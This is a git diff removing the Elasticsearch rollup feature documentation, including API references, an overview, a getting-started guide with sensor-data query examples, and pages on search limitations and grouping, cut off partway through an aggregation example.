However, you can use an expression to match multiple non-rollup -indices or data streams. --- - -[[rollup-search-request-body]] -==== {api-request-body-title} - -The request body supports a subset of features from the regular Search API. It -supports: - -- `query` param for specifying an DSL query, subject to some limitations -(see <> and <> -- `aggregations` param for specifying aggregations - -Functionality that is not available: - -- `size`: Because rollups work on pre-aggregated data, no search hits can be -returned and so size must be set to zero or omitted entirely. -- `highlighter`, `suggestors`, `post_filter`, `profile`, `explain`: These are -similarly disallowed. - -[[rollup-search-example]] -==== {api-examples-title} - -===== Historical-only search example - -Imagine we have an index named `sensor-1` full of raw data, and we have created -a {rollup-job} with the following configuration: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -This rolls up the `sensor-*` pattern and stores the results in `sensor_rollup`. -To search this rolled up data, we need to use the `_rollup_search` endpoint. -However, you'll notice that we can use regular query DSL to search the rolled-up -data: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "max_temperature": { - "max": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] -// TEST[s/_rollup_search/_rollup_search?filter_path=took,timed_out,terminated_early,_shards,hits,aggregations/] - -The query is targeting the `sensor_rollup` data, since this contains the rollup -data as configured in the job. A `max` aggregation has been used on the -`temperature` field, yielding the following response: - -[source,console-result] ----- -{ - "took" : 102, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "max_temperature" : { - "value" : 202.0 - } - } -} ----- -// TESTRESPONSE[s/"took" : 102/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] - -The response is exactly as you'd expect from a regular query + aggregation; it -provides some metadata about the request (`took`, `_shards`, etc), the search -hits (which is always empty for rollup searches), and the aggregation response. - -Rollup searches are limited to functionality that was configured in the -{rollup-job}. For example, we are not able to calculate the average temperature -because `avg` was not one of the configured metrics for the `temperature` field. 
-If we try to execute that search: - -[source,console] --------------------------------------------------- -GET sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "avg_temperature": { - "avg": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[catch:/illegal_argument_exception/] - -[source,console-result] ----- -{ - "error": { - "root_cause": [ - { - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - } - ], - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - }, - "status": 400 -} ----- -// TESTRESPONSE[s/"stack_trace": \.\.\./"stack_trace": $body.$_path/] - -===== Searching both historical rollup and non-rollup data - -The rollup search API has the capability to search across both "live" -non-rollup data and the aggregated rollup data. This is done by simply adding -the live indices to the URI: - -[source,console] --------------------------------------------------- -GET sensor-1,sensor_rollup/_rollup_search <1> -{ - "size": 0, - "aggregations": { - "max_temperature": { - "max": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[s/_rollup_search/_rollup_search?filter_path=took,timed_out,terminated_early,_shards,hits,aggregations/] -<1> Note the URI now searches `sensor-1` and `sensor_rollup` at the same time - -When the search is executed, the rollup search endpoint does two things: - -1. The original request is sent to the non-rollup index unaltered. -2. A rewritten version of the original request is sent to the rollup index. - -When the two responses are received, the endpoint rewrites the rollup response -and merges the two together. During the merging process, if there is any overlap -in buckets between the two responses, the buckets from the non-rollup index are -used. - -The response to the above query looks as expected, despite spanning rollup and -non-rollup indices: - -[source,console-result] ----- -{ - "took" : 102, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "max_temperature" : { - "value" : 202.0 - } - } -} ----- -// TESTRESPONSE[s/"took" : 102/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] diff --git a/docs/reference/rollup/apis/start-job.asciidoc b/docs/reference/rollup/apis/start-job.asciidoc deleted file mode 100644 index 28b09375dab..00000000000 --- a/docs/reference/rollup/apis/start-job.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-start-job]] -=== Start {rollup-jobs} API -[subs="attributes"] -++++ -Start {rollup-jobs} -++++ - -Starts an existing, stopped {rollup-job}. - -experimental[] - -[[rollup-start-job-request]] -==== {api-request-title} - -`POST _rollup/job//_start` - -[[rollup-start-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. 
- -[[rollup-start-job-desc]] -==== {api-description-title} - -If you try to start a job that does not exist, an exception occurs. If you try -to start a job that is already started, nothing happens. - -[[rollup-start-job-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the {rollup-job}. - -[[rollup-start-job-response-codes]] -==== {api-response-codes-title} - - `404` (Missing resources):: - This code indicates that there are no resources that match the request. It - occurs if you try to start a job that doesn't exist. - -[[rollup-start-job-examples]] -==== {api-examples-title} - -If we have already created a {rollup-job} named `sensor`, it can be started with: - -[source,console] --------------------------------------------------- -POST _rollup/job/sensor/_start --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -Which will return the response: - -[source,console-result] ----- -{ - "started": true -} ----- \ No newline at end of file diff --git a/docs/reference/rollup/apis/stop-job.asciidoc b/docs/reference/rollup/apis/stop-job.asciidoc deleted file mode 100644 index 727981265cb..00000000000 --- a/docs/reference/rollup/apis/stop-job.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-stop-job]] -=== Stop {rollup-jobs} API -[subs="attributes"] -++++ -Stop {rollup-jobs} -++++ - -Stops an existing, started {rollup-job}. - -experimental[] - -[[rollup-stop-job-request]] -==== {api-request-title} - -`POST _rollup/job//_stop` - -[[rollup-stop-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-stop-job-desc]] -===== {api-description-title} - -If you try to stop a job that does not exist, an exception occurs. If you try -to stop a job that is already stopped, nothing happens. - -[[rollup-stop-job-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the {rollup-job}. - -[[rollup-stop-job-query-parms]] -==== {api-query-parms-title} - -`timeout`:: - (Optional, TimeValue) If `wait_for_completion` is `true`, the API blocks for - (at maximum) the specified duration while waiting for the job to stop. If more - than `timeout` time has passed, the API throws a timeout exception. Defaults - to `30s`. -+ --- -NOTE: Even if a timeout exception is thrown, the stop request is still -processing and eventually moves the job to `STOPPED`. The timeout simply means -the API call itself timed out while waiting for the status change. - --- - -`wait_for_completion`:: - (Optional, Boolean) If set to `true`, causes the API to block until the - indexer state completely stops. If set to `false`, the API returns immediately - and the indexer is stopped asynchronously in the background. Defaults to - `false`. - -[[rollup-stop-job-response-codes]] -==== {api-response-codes-title} - -`404` (Missing resources):: - This code indicates that there are no resources that match the request. It - occurs if you try to stop a job that doesn't exist. - -[[rollup-stop-job-examples]] -==== {api-examples-title} - -Since only a stopped job can be deleted, it can be useful to block the API until -the indexer has fully stopped. 
This is accomplished with the -`wait_for_completion` query parameter, and optionally a `timeout`: - - -[source,console] --------------------------------------------------- -POST _rollup/job/sensor/_stop?wait_for_completion=true&timeout=10s --------------------------------------------------- -// TEST[setup:sensor_started_rollup_job] - -The parameter blocks the API call from returning until either the job has moved -to `STOPPED` or the specified time has elapsed. If the specified time elapses -without the job moving to `STOPPED`, a timeout exception is thrown. diff --git a/docs/reference/rollup/index.asciidoc b/docs/reference/rollup/index.asciidoc deleted file mode 100644 index 99180e2f32d..00000000000 --- a/docs/reference/rollup/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[xpack-rollup]] -== Rolling up historical data - -experimental[] - -Keeping historical data around for analysis is extremely useful but often avoided due to the financial cost of -archiving massive amounts of data. Retention periods are thus driven by financial realities rather than by the -usefulness of extensive historical data. - -// tag::rollup-intro[] -The {stack} {rollup-features} provide a means to summarize and store historical -data so that it can still be used for analysis, but at a fraction of the storage -cost of raw data. -// end::rollup-intro[] - -* <> -* <> -* <> -* <> -* <> -* <> - - -include::overview.asciidoc[] -include::api-quickref.asciidoc[] -include::rollup-getting-started.asciidoc[] -include::understanding-groups.asciidoc[] -include::rollup-agg-limitations.asciidoc[] -include::rollup-search-limitations.asciidoc[] \ No newline at end of file diff --git a/docs/reference/rollup/overview.asciidoc b/docs/reference/rollup/overview.asciidoc deleted file mode 100644 index 1d56b56f0bd..00000000000 --- a/docs/reference/rollup/overview.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-overview]] -=== {rollup-cap} overview -++++ -Overview -++++ - -experimental[] - -Time-based data (documents that are predominantly identified by their timestamp) often have associated retention policies -to manage data growth. For example, your system may be generating 500 documents every second. That will generate -43 million documents per day, and nearly 16 billion documents a year. - -While your analysts and data scientists may wish you stored that data indefinitely for analysis, time is never-ending and -so your storage requirements will continue to grow without bound. Retention policies are therefore often dictated -by the simple calculation of storage costs over time, and what the organization is willing to pay to retain historical data. -Often these policies start deleting data after a few months or years. - -Storage cost is a fixed quantity. It takes X money to store Y data. But the utility of a piece of data often changes -with time. Sensor data gathered at millisecond granularity is extremely useful right now, reasonably useful if from a -few weeks ago, and only marginally useful if older than a few months. - -So while the cost of storing a millisecond of sensor data from ten years ago is fixed, the value of that individual sensor -reading often diminishes with time. It's not useless -- it could easily contribute to a useful analysis -- but it's reduced -value often leads to deletion rather than paying the fixed storage cost. - -[discrete] -==== Rollup stores historical data at reduced granularity - -That's where Rollup comes into play. 
The Rollup functionality summarizes old, high-granularity data into a
reduced-granularity format for long-term storage. By "rolling" the data up into
a single summary document, historical data can be compressed greatly compared
to the raw data.

For example, consider the system that's generating 43 million documents every
day. The second-by-second data is useful for real-time analysis, but historical
analyses looking over ten years of data are likely to work at a larger
interval, such as hourly or daily trends.

If we compress the 43 million documents into hourly summaries, we can save vast
amounts of space. The Rollup feature automates this process of summarizing
historical data.

Details about setting up and configuring Rollup are covered in <>.

[discrete]
==== Rollup uses standard query DSL

The Rollup feature exposes a new search endpoint (`/_rollup_search` vs the
standard `/_search`) which knows how to search over rolled-up data.
Importantly, this endpoint accepts 100% normal {es} Query DSL. Your application
does not need to learn a new DSL to inspect historical data; it can simply
reuse existing queries and dashboards.

There are some limitations to the functionality available: not all queries and
aggregations are supported, certain search features (highlighting, etc.) are
disabled, and the available fields depend on how the rollup was configured.
These limitations are covered in more detail in <>.

But if your queries, aggregations, and dashboards only use the available
functionality, redirecting them to historical data is trivial.

[discrete]
==== Rollup merges "live" and "rolled" data

A useful feature of Rollup is the ability to query both "live", real-time data
and historical "rolled" data in a single query.

For example, your system may keep a month of raw data. After a month, it is
rolled up into historical summaries using Rollup and the raw data is deleted.

If you were to query the raw data, you'd only see the most recent month. And if
you were to query the rolled up data, you would only see data older than a
month. The RollupSearch endpoint, however, supports querying both at the same
time. It takes the results from both data sources and merges them together. If
there is overlap between the "live" and "rolled" data, live data is preferred
to increase accuracy.

[discrete]
==== Rollup is multi-interval aware

Finally, Rollup is capable of intelligently utilizing the best interval
available. If you've worked with the summarizing features of other products,
you'll find that they can be limiting. If you configure rollups at daily
intervals, your queries and charts can only work with daily intervals. If you
need a monthly interval, you have to create another rollup that explicitly
stores monthly averages, and so on.

The Rollup feature stores data in such a way that queries can identify the
smallest available interval and use that for their processing. If you store
rollups at a daily interval, queries can be executed on daily or longer
intervals (weekly, monthly, etc.) without the need to explicitly configure a
new rollup job. This helps alleviate one of the major disadvantages of a rollup
system: reduced flexibility relative to raw data.
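For example, the following is a hypothetical sketch rather than part of the
original page: assuming a rollup index named `sensor_rollup` whose job used an
hourly `date_histogram` group on a `timestamp` field, the same rolled-up data
could be bucketed by day at query time with no extra configuration:

[source,console]
--------------------------------------------------
GET /sensor_rollup/_rollup_search
{
  "size": 0,
  "aggregations": {
    "daily_timeline": {
      "date_histogram": {
        "field": "timestamp",
        "fixed_interval": "24h"
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:hypothetical example, not part of the documented test setup]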
- diff --git a/docs/reference/rollup/rollup-agg-limitations.asciidoc b/docs/reference/rollup/rollup-agg-limitations.asciidoc deleted file mode 100644 index 8390c5b80a5..00000000000 --- a/docs/reference/rollup/rollup-agg-limitations.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-agg-limitations]] -=== {rollup-cap} aggregation limitations - -experimental[] - -There are some limitations to how fields can be rolled up / aggregated. This page highlights the major limitations so that -you are aware of them. - -[discrete] -==== Limited aggregation components - -The Rollup functionality allows fields to be grouped with the following aggregations: - -- Date Histogram aggregation -- Histogram aggregation -- Terms aggregation - -And the following metrics are allowed to be specified for numeric fields: - -- Min aggregation -- Max aggregation -- Sum aggregation -- Average aggregation -- Value Count aggregation \ No newline at end of file diff --git a/docs/reference/rollup/rollup-api.asciidoc b/docs/reference/rollup/rollup-api.asciidoc deleted file mode 100644 index a24b85513db..00000000000 --- a/docs/reference/rollup/rollup-api.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-apis]] -== Rollup APIs - -[discrete] -[[rollup-jobs-endpoint]] -=== Jobs - -* <> or <> -* <> or <> -* <> - -[discrete] -[[rollup-data-endpoint]] -=== Data - -* <> -* <> - -[discrete] -[[rollup-search-endpoint]] -=== Search - -* <> - - -include::apis/put-job.asciidoc[] -include::apis/delete-job.asciidoc[] -include::apis/get-job.asciidoc[] -include::apis/rollup-caps.asciidoc[] -include::apis/rollup-index-caps.asciidoc[] -include::apis/rollup-search.asciidoc[] -include::apis/start-job.asciidoc[] -include::apis/stop-job.asciidoc[] \ No newline at end of file diff --git a/docs/reference/rollup/rollup-getting-started.asciidoc b/docs/reference/rollup/rollup-getting-started.asciidoc deleted file mode 100644 index 5ef9b090a61..00000000000 --- a/docs/reference/rollup/rollup-getting-started.asciidoc +++ /dev/null @@ -1,324 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-getting-started]] -=== Getting started with {rollups} -++++ -Getting started -++++ - -experimental[] - -To use the Rollup feature, you need to create one or more "Rollup Jobs". These jobs run continuously in the background -and rollup the index or indices that you specify, placing the rolled documents in a secondary index (also of your choosing). - -Imagine you have a series of daily indices that hold sensor data (`sensor-2017-01-01`, `sensor-2017-01-02`, etc). A sample document might -look like this: - -[source,js] --------------------------------------------------- -{ - "timestamp": 1516729294000, - "temperature": 200, - "voltage": 5.2, - "node": "a" -} --------------------------------------------------- -// NOTCONSOLE - -[discrete] -==== Creating a rollup job - -We'd like to rollup these documents into hourly summaries, which will allow us to generate reports and dashboards with any time interval -one hour or greater. 
A rollup job might look like this: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "60m" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -We give the job the ID of "sensor" (in the url: `PUT _rollup/job/sensor`), and tell it to rollup the index pattern `"sensor-*"`. -This job will find and rollup any index that matches that pattern. Rollup summaries are then stored in the `"sensor_rollup"` index. - -The `cron` parameter controls when and how often the job activates. When a rollup job's cron schedule triggers, it will begin rolling up -from where it left off after the last activation. So if you configure the cron to run every 30 seconds, the job will process the last 30 -seconds worth of data that was indexed into the `sensor-*` indices. - -If instead the cron was configured to run once a day at midnight, the job would process the last 24 hours worth of data. The choice is largely -preference, based on how "realtime" you want the rollups, and if you wish to process continuously or move it to off-peak hours. - -Next, we define a set of `groups`. Essentially, we are defining the dimensions -that we wish to pivot on at a later date when querying the data. The grouping in -this job allows us to use `date_histogram` aggregations on the `timestamp` field, -rolled up at hourly intervals. It also allows us to run terms aggregations on -the `node` field. - -.Date histogram interval vs cron schedule -********************************** -You'll note that the job's cron is configured to run every 30 seconds, but the date_histogram is configured to -rollup at 60 minute intervals. How do these relate? - -The date_histogram controls the granularity of the saved data. Data will be rolled up into hourly intervals, and you will be unable -to query with finer granularity. The cron simply controls when the process looks for new data to rollup. Every 30 seconds it will see -if there is a new hour's worth of data and roll it up. If not, the job goes back to sleep. - -Often, it doesn't make sense to define such a small cron (30s) on a large interval (1h), because the majority of the activations will -simply go back to sleep. But there's nothing wrong with it either, the job will do the right thing. - -********************************** - -After defining which groups should be generated for the data, you next configure -which metrics should be collected. By default, only the `doc_counts` are -collected for each group. To make rollup useful, you will often add metrics -like averages, mins, maxes, etc. In this example, the metrics are fairly -straightforward: we want to save the min/max/sum of the `temperature` -field, and the average of the `voltage` field. - -.Averages aren't composable?! -********************************** -If you've worked with rollups before, you may be cautious around averages. If an -average is saved for a 10 minute interval, it usually isn't useful for larger -intervals. You cannot average six 10-minute averages to find a hourly average; -the average of averages is not equal to the total average. 
- -For this reason, other systems tend to either omit the ability to average or -store the average at multiple intervals to support more flexible querying. - -Instead, the {rollup-features} save the `count` and `sum` for the defined time -interval. This allows us to reconstruct the average at any interval greater-than -or equal to the defined interval. This gives maximum flexibility for minimal -storage costs... and you don't have to worry about average accuracies (no -average of averages here!) -********************************** - -For more details about the job syntax, see <>. - -After you execute the above command and create the job, you'll receive the following response: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- - -[discrete] -==== Starting the job - -After the job is created, it will be sitting in an inactive state. Jobs need to be started before they begin processing data (this allows -you to stop them later as a way to temporarily pause, without deleting the configuration). - -To start the job, execute this command: - -[source,console] --------------------------------------------------- -POST _rollup/job/sensor/_start --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -[discrete] -==== Searching the rolled results - -After the job has run and processed some data, we can use the <> endpoint to do some searching. The Rollup feature is designed -so that you can use the same Query DSL syntax that you are accustomed to... it just happens to run on the rolled up data instead. - -For example, take this query: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "max_temperature": { - "max": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] - -It's a simple aggregation that calculates the maximum of the `temperature` field. But you'll notice that is is being sent to the `sensor_rollup` -index instead of the raw `sensor-*` indices. And you'll also notice that it is using the `_rollup_search` endpoint. Otherwise the syntax -is exactly as you'd expect. - -If you were to execute that query, you'd receive a result that looks like a normal aggregation response: - -[source,console-result] ----- -{ - "took" : 102, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "max_temperature" : { - "value" : 202.0 - } - } -} ----- -// TESTRESPONSE[s/"took" : 102/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] - -The only notable difference is that Rollup search results have zero `hits`, because we aren't really searching the original, live data any -more. Otherwise it's identical syntax. - -There are a few interesting takeaways here. Firstly, even though the data was rolled up with hourly intervals and partitioned by -node name, the query we ran is just calculating the max temperature across all documents. The `groups` that were configured in the job -are not mandatory elements of a query, they are just extra dimensions you can partition on. Second, the request and response syntax -is nearly identical to normal DSL, making it easy to integrate into dashboards and applications. 
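As a small illustration of that point (a sketch added here, not part of the
original quickstart, reusing the `sensor_rollup` index and the `node` terms
group configured above), a configured group can also be used as a query-time
filter alongside the same metric:

[source,console]
--------------------------------------------------
GET /sensor_rollup/_rollup_search
{
  "size": 0,
  "query": {
    "term": {
      "node": "a"
    }
  },
  "aggregations": {
    "max_temperature": {
      "max": {
        "field": "temperature"
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:hypothetical example, not part of the documented test setup]

Because `node` was saved as a `terms` group, it is available both for
aggregating and for filtering with the limited set of queries that Rollup
Search supports.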
- -Finally, we can use those grouping fields we defined to construct a more complicated query: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "timeline": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "7d" - }, - "aggs": { - "nodes": { - "terms": { - "field": "node" - }, - "aggs": { - "max_temperature": { - "max": { - "field": "temperature" - } - }, - "avg_voltage": { - "avg": { - "field": "voltage" - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] - -Which returns a corresponding response: - -[source,console-result] ----- -{ - "took" : 93, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "timeline" : { - "meta" : { }, - "buckets" : [ - { - "key_as_string" : "2018-01-18T00:00:00.000Z", - "key" : 1516233600000, - "doc_count" : 6, - "nodes" : { - "doc_count_error_upper_bound" : 0, - "sum_other_doc_count" : 0, - "buckets" : [ - { - "key" : "a", - "doc_count" : 2, - "max_temperature" : { - "value" : 202.0 - }, - "avg_voltage" : { - "value" : 5.1499998569488525 - } - }, - { - "key" : "b", - "doc_count" : 2, - "max_temperature" : { - "value" : 201.0 - }, - "avg_voltage" : { - "value" : 5.700000047683716 - } - }, - { - "key" : "c", - "doc_count" : 2, - "max_temperature" : { - "value" : 202.0 - }, - "avg_voltage" : { - "value" : 4.099999904632568 - } - } - ] - } - } - ] - } - } -} - ----- -// TESTRESPONSE[s/"took" : 93/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] - -In addition to being more complicated (date histogram and a terms aggregation, plus an additional average metric), you'll notice -the date_histogram uses a `7d` interval instead of `60m`. - -[discrete] -==== Conclusion - -This quickstart should have provided a concise overview of the core functionality that Rollup exposes. There are more tips and things -to consider when setting up Rollups, which you can find throughout the rest of this section. You may also explore the <> -for an overview of what is available. diff --git a/docs/reference/rollup/rollup-search-limitations.asciidoc b/docs/reference/rollup/rollup-search-limitations.asciidoc deleted file mode 100644 index adc597d02e9..00000000000 --- a/docs/reference/rollup/rollup-search-limitations.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-search-limitations]] -=== {rollup-cap} search limitations - -experimental[] - -While we feel the Rollup function is extremely flexible, the nature of summarizing data means there will be some limitations. Once -live data is thrown away, you will always lose some flexibility. - -This page highlights the major limitations so that you are aware of them. - -[discrete] -==== Only one {rollup} index per search - -When using the <> endpoint, the `index` parameter accepts one or more indices. These can be a mix of regular, non-rollup -indices and rollup indices. However, only one rollup index can be specified. The exact list of rules for the `index` parameter are as -follows: - -- At least one index/index-pattern must be specified. This can be either a rollup or non-rollup index. Omitting the index parameter, -or using `_all`, is not permitted -- Multiple non-rollup indices may be specified -- Only one rollup index may be specified. 
If more than one are supplied an exception will be thrown -- Index patterns may be used, but if they match more than one rollup index an exception will be thrown. - -This limitation is driven by the logic that decides which jobs are the "best" for any given query. If you have ten jobs stored in a single -index, which cover the source data with varying degrees of completeness and different intervals, the query needs to determine which set -of jobs to actually search. Incorrect decisions can lead to inaccurate aggregation results (e.g. over-counting doc counts, or bad metrics). -Needless to say, this is a technically challenging piece of code. - -To help simplify the problem, we have limited search to just one rollup index at a time (which may contain multiple jobs). In the future we -may be able to open this up to multiple rollup jobs. - -[discrete] -[[aggregate-stored-only]] -==== Can only aggregate what's been stored - -A perhaps obvious limitation, but rollups can only aggregate on data that has been stored in the rollups. If you don't configure the -rollup job to store metrics about the `price` field, you won't be able to use the `price` field in any query or aggregation. - -For example, the `temperature` field in the following query has been stored in a rollup job... but not with an `avg` metric. Which means -the usage of `avg` here is not allowed: - -[source,console] --------------------------------------------------- -GET sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "avg_temperature": { - "avg": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] -// TEST[catch:/illegal_argument_exception/] - -The response will tell you that the field and aggregation were not possible, because no rollup jobs were found which contained them: - -[source,console-result] ----- -{ - "error": { - "root_cause": [ - { - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - } - ], - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - }, - "status": 400 -} ----- -// TESTRESPONSE[s/"stack_trace": \.\.\./"stack_trace": $body.$_path/] - -[discrete] -==== Interval granularity - -Rollups are stored at a certain granularity, as defined by the `date_histogram` group in the configuration. This means you -can only search/aggregate the rollup data with an interval that is greater-than or equal to the configured rollup interval. - -For example, if data is rolled up at hourly intervals, the <> API can aggregate on any time interval -hourly or greater. Intervals that are less than an hour will throw an exception, since the data simply doesn't -exist for finer granularities. - -[[rollup-search-limitations-intervals]] -.Requests must be multiples of the config -********************************** -Perhaps not immediately apparent, but the interval specified in an aggregation request must be a whole -multiple of the configured interval. If the job was configured to rollup on `3d` intervals, you can only -query and aggregate on multiples of three (`3d`, `6d`, `9d`, etc). - -A non-multiple wouldn't work, since the rolled up data wouldn't cleanly "overlap" with the buckets generated -by the aggregation, leading to incorrect results. 
- -For that reason, an error is thrown if a whole multiple of the configured interval isn't found. -********************************** - -Because the RollupSearch endpoint can "upsample" intervals, there is no need to configure jobs with multiple intervals (hourly, daily, etc). -It's recommended to just configure a single job with the smallest granularity that is needed, and allow the search endpoint to upsample -as needed. - -That said, if multiple jobs are present in a single rollup index with varying intervals, the search endpoint will identify and use the job(s) -with the largest interval to satisfy the search request. - -[discrete] -==== Limited querying components - -The Rollup functionality allows `query`'s in the search request, but with a limited subset of components. The queries currently allowed are: - -- Term Query -- Terms Query -- Range Query -- MatchAll Query -- Any compound query (Boolean, Boosting, ConstantScore, etc) - -Furthermore, these queries can only use fields that were also saved in the rollup job as a `group`. -If you wish to filter on a keyword `hostname` field, that field must have been configured in the rollup job under a `terms` grouping. - -If you attempt to use an unsupported query, or the query references a field that wasn't configured in the rollup job, an exception will be -thrown. We expect the list of support queries to grow over time as more are implemented. - -[discrete] -==== Timezones - -Rollup documents are stored in the timezone of the `date_histogram` group configuration in the job. If no timezone is specified, the default -is to rollup timestamps in `UTC`. - diff --git a/docs/reference/rollup/understanding-groups.asciidoc b/docs/reference/rollup/understanding-groups.asciidoc deleted file mode 100644 index face43cf966..00000000000 --- a/docs/reference/rollup/understanding-groups.asciidoc +++ /dev/null @@ -1,248 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-understanding-groups]] -=== Understanding groups - -experimental[] - -To preserve flexibility, Rollup Jobs are defined based on how future queries may need to use the data. Traditionally, systems force -the admin to make decisions about what metrics to rollup and on what interval. E.g. The average of `cpu_time` on an hourly basis. This -is limiting; if, in the future, the admin wishes to see the average of `cpu_time` on an hourly basis _and_ partitioned by `host_name`, -they are out of luck. - -Of course, the admin can decide to rollup the `[hour, host]` tuple on an hourly basis, but as the number of grouping keys grows, so do the -number of tuples the admin needs to configure. Furthermore, these `[hours, host]` tuples are only useful for hourly rollups... daily, weekly, -or monthly rollups all require new configurations. - -Rather than force the admin to decide ahead of time which individual tuples should be rolled up, Elasticsearch's Rollup jobs are configured -based on which groups are potentially useful to future queries. 
For example, this configuration: - -[source,js] --------------------------------------------------- -"groups" : { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": ["hostname", "datacenter"] - }, - "histogram": { - "fields": ["load", "net_in", "net_out"], - "interval": 5 - } -} --------------------------------------------------- -// NOTCONSOLE - -Allows `date_histogram` to be used on the `"timestamp"` field, `terms` aggregations to be used on the `"hostname"` and `"datacenter"` -fields, and `histograms` to be used on any of `"load"`, `"net_in"`, `"net_out"` fields. - -Importantly, these aggs/fields can be used in any combination. This aggregation: - -[source,js] --------------------------------------------------- -"aggs" : { - "hourly": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h" - }, - "aggs": { - "host_names": { - "terms": { - "field": "hostname" - } - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -is just as valid as this aggregation: - -[source,js] --------------------------------------------------- -"aggs" : { - "hourly": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h" - }, - "aggs": { - "data_center": { - "terms": { - "field": "datacenter" - } - }, - "aggs": { - "host_names": { - "terms": { - "field": "hostname" - } - }, - "aggs": { - "load_values": { - "histogram": { - "field": "load", - "interval": 5 - } - } - } - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - - -You'll notice that the second aggregation is not only substantially larger, it also swapped the position of the terms aggregation on -`"hostname"`, illustrating how the order of aggregations does not matter to rollups. Similarly, while the `date_histogram` is required -for rolling up data, it isn't required while querying (although often used). For example, this is a valid aggregation for -Rollup Search to execute: - - -[source,js] --------------------------------------------------- -"aggs" : { - 